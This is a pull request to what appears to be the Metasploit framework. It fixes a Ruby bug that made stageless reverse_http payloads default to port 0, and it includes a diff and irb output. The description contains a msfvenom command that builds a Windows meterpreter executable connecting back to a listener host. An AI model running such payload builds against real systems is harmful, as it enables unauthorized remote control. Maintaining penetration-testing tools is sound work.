### PR TITLE
Fix stageless reverse_http using port 0

### DIFF
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -56,7 +56,7 @@ module Msf::Payload::TransportConfig
     {
       :scheme       => 'http',
       :lhost        => opts[:lhost] || datastore['LHOST'],
-      :lport        => opts[:lport].to_i || datastore['LPORT'].to_i,
+      :lport        => (opts[:lport] || datastore['LPORT']).to_i,
       :uri          => uri,
       :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
       :retry_total  => datastore['SessionRetryTotal'].to_i,


### PR DESCRIPTION
Generate a stageless reverse_http binary:

```
./msfvenom -p windows/meterpreter_reverse_http -f exe -o m.exe LHOST=192.168.58.1 LPORT=8888
```

Running it will not connect back to port 8888. Instead it tries, and fails, to connect to port 80. This is because it has been generated with lport of 0 since `opts[:lport]` is undefined.

```
2.1.7 :004 > opts = {}
 => {} 
2.1.7 :005 > opts[:lport].to_i || 8888
 => 0
```

Doing the check for nil first makes this work as expected:

```
2.1.7 :010 > (opts[:lport] || 8888).to_i
 => 8888
```

Introduced in #6234 and #6227 combined.
